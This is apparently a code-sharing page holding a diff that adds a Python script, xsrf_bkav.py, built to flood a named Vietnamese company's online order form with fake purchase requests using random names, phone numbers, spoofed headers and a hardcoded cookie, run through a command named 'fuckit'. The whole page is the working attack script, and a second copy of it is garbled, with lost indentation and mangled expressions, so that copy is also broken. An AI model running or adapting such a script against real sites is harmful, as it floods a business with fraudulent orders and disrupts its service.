anhtran · June 2, 2015 05:59
diff --git a/xsrf_bkav.py b/xsrf_bkav.py
 """
 #USAGE:
 	## Requirements:
 	requests
 	names
 	click

 	## Executing
 	python xsrf_bkav.py fuckit [number of the requests]
 """

 import requests
 import names
 import random
 import json
 import click


 url = 'http://www.bkav.com.vn/b-category?p_p_id=buyproductaction_WAR_BkavPaymentportlet&p_p_lifecycle=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&_buyproductaction_WAR_BkavPaymentportlet_javax.portlet.action=processAddProduct'

 def rand_x_digit_num(x, leading_zeroes=True):
    """
    Return an X digit number, leading_zeroes returns a string, otherwise int
    """
    if not leading_zeroes:
        # wrap with str() for uniform results
        return random.randint(10**(x-1), 10**x-1)  
    else:
        if x > 6000:
            return ''.join([str(random.randint(0, 9)) for i in xrange(x)])
        else:
            return '{0:0{x}d}'.format(random.randint(0, 10**x-1), x=x)	

 def get_data(name, phone):
 	return {
 		'buytype': 1,
 		'_buyproductaction_WAR_BkavPaymentportlet_full-name': name,
 		'_buyproductaction_WAR_BkavPaymentportlet_customer-phone': phone,
 		'_buyproductaction_WAR_BkavPaymentportlet_provinceId': 2,
 		'_buyproductaction_WAR_BkavPaymentportlet_districtId': 31,
 		'_buyproductaction_WAR_BkavPaymentportlet_addressId': '01 Công Xã Paris',
 		'_buyproductaction_WAR_BkavPaymentportlet_': 'ĐẶT MUA',
 		'_buyproductaction_WAR_BkavPaymentportlet_bphoneQuantity': 1,
 		'_buyproductaction_WAR_BkavPaymentportlet_paymentType': 1,
 		'_buyproductaction_WAR_BkavPaymentportlet_cardType': 'card3',
 		'_buyproductaction_WAR_BkavPaymentportlet_khacten': ''
 	}


 payload = {
    "Host": "www.bkav.com.vn",
    "Connection": "keep-alive",
    "Content-Length": 888,
    "Origin": "https://www.bkav.com.vn",
    "X-Requested-With": "XMLHttpRequest",
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5",
    "Content-Type": "application/json",
    "Accept": "*/*",
    "Referer": "http://www.bkav.com.vn/b-category/-/product/377",
    "Accept-Encoding": "gzip,deflate,sdch",
    "Accept-Language": "fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4",
    "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3",
    "Cookie": "ASP.NET_SessionId=j1r1b2a2v2w245; GSFV=FirstVisit=; GSRef=https://www.google.fr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CHgQFjAA&url=https://www.mywbsite.fr/&ei=FZq_T4abNcak0QWZ0vnWCg&usg=AFQjCNHq90dwj5RiEfr1Pw; HelpRotatorCookie=HelpLayerWasSeen=0; NSC_GSPOUGS!TTM=ffffffff09f4f58455e445a4a423660; GS=Site=frfr; __utma=1.219229010.1337956889.1337956889.1337958824.2; __utmb=1.1.10.1337958824; __utmc=1; __utmz=1.1337956889.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided)"
 }

 headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) '
                  'Chrome/23.0.1271.64 Safari/537.11',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
    'Accept-Encoding': 'none',
    'Accept-Language': 'en-US,en;q=0.8',
    'Connection': 'keep-alive'
 }


 @click.group()
 def cmd():
    pass

 @click.command(name='fuckit')
 @click.argument('num_requests')
 def send_it_out(num_requests):
 	"""
 	Enter the number of requests to get start.
 	"""
 	for i in range(0, int(num_requests)):
 		try:
 			d = payload
 			d.update(get_data(names.get_full_name(), rand_x_digit_num(9)))
 			r = requests.post(url, data=json.dumps(d), headers=headers, timeout=3)
 			if r.status_code == 200:
 				click.echo(click.style('--> ', fg='green') + '[{}] {}'.format(i+1, d['_buyproductaction_WAR_BkavPaymentportlet_full-name']))
 		except requests.exceptions.Timeout:
 			click.echo(click.style('--> Timeout', fg='yellow'))
 		d = ''

 cmd.add_command(send_it_out)

 if __name__ == '__main__':
    cmd()
	"""
	#USAGE:
	## Requirements:
	requests
	names
	click

	## Executing
	python xsrf_bkav.py fuckit [number of the requests]
	"""

	import requests
	import names
	import random
	import json
	import click


	url = 'http://www.bkav.com.vn/b-category?p_p_id=buyproductaction_WAR_BkavPaymentportlet&p_p_lifecycle=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&_buyproductaction_WAR_BkavPaymentportlet_javax.portlet.action=processAddProduct'

	def rand_x_digit_num(x, leading_zeroes=True):
	"""
	Return an X digit number, leading_zeroes returns a string, otherwise int
	"""
	if not leading_zeroes:
	# wrap with str() for uniform results
	return random.randint(10(x-1), 10x-1)
	else:
	if x > 6000:
	return ''.join([str(random.randint(0, 9)) for i in xrange(x)])
	else:
	return '{0:0{x}d}'.format(random.randint(0, 10**x-1), x=x)

	def get_data(name, phone):
	return {
	'buytype': 1,
	'_buyproductaction_WAR_BkavPaymentportlet_full-name': name,
	'_buyproductaction_WAR_BkavPaymentportlet_customer-phone': phone,
	'_buyproductaction_WAR_BkavPaymentportlet_provinceId': 2,
	'_buyproductaction_WAR_BkavPaymentportlet_districtId': 31,
	'_buyproductaction_WAR_BkavPaymentportlet_addressId': '01 Công Xã Paris',
	'_buyproductaction_WAR_BkavPaymentportlet_': 'ĐẶT MUA',
	'_buyproductaction_WAR_BkavPaymentportlet_bphoneQuantity': 1,
	'_buyproductaction_WAR_BkavPaymentportlet_paymentType': 1,
	'_buyproductaction_WAR_BkavPaymentportlet_cardType': 'card3',
	'_buyproductaction_WAR_BkavPaymentportlet_khacten': ''
	}


	payload = {
	"Host": "www.bkav.com.vn",
	"Connection": "keep-alive",
	"Content-Length": 888,
	"Origin": "https://www.bkav.com.vn",
	"X-Requested-With": "XMLHttpRequest",
	"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5",
	"Content-Type": "application/json",
	"Accept": "/",
	"Referer": "http://www.bkav.com.vn/b-category/-/product/377",
	"Accept-Encoding": "gzip,deflate,sdch",
	"Accept-Language": "fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4",
	"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3",
	"Cookie": "ASP.NET_SessionId=j1r1b2a2v2w245; GSFV=FirstVisit=; GSRef=https://www.google.fr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CHgQFjAA&url=https://www.mywbsite.fr/&ei=FZq_T4abNcak0QWZ0vnWCg&usg=AFQjCNHq90dwj5RiEfr1Pw; HelpRotatorCookie=HelpLayerWasSeen=0; NSC_GSPOUGS!TTM=ffffffff09f4f58455e445a4a423660; GS=Site=frfr; __utma=1.219229010.1337956889.1337956889.1337958824.2; __utmb=1.1.10.1337958824; __utmc=1; __utmz=1.1337956889.1.1.utmcsr=google\|utmccn=(organic)\|utmcmd=organic\|utmctr=(not%20provided)"
	}

	headers = {
	'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) '
	'Chrome/23.0.1271.64 Safari/537.11',
	'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8',
	'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
	'Accept-Encoding': 'none',
	'Accept-Language': 'en-US,en;q=0.8',
	'Connection': 'keep-alive'
	}


	@click.group()
	def cmd():
	pass

	@click.command(name='fuckit')
	@click.argument('num_requests')
	def send_it_out(num_requests):
	"""
	Enter the number of requests to get start.
	"""
	for i in range(0, int(num_requests)):
	try:
	d = payload
	d.update(get_data(names.get_full_name(), rand_x_digit_num(9)))
	r = requests.post(url, data=json.dumps(d), headers=headers, timeout=3)
	if r.status_code == 200:
	click.echo(click.style('--> ', fg='green') + '[{}] {}'.format(i+1, d['_buyproductaction_WAR_BkavPaymentportlet_full-name']))
	except requests.exceptions.Timeout:
	click.echo(click.style('--> Timeout', fg='yellow'))
	d = ''

	cmd.add_command(send_it_out)

	if __name__ == '__main__':
	cmd()
No results found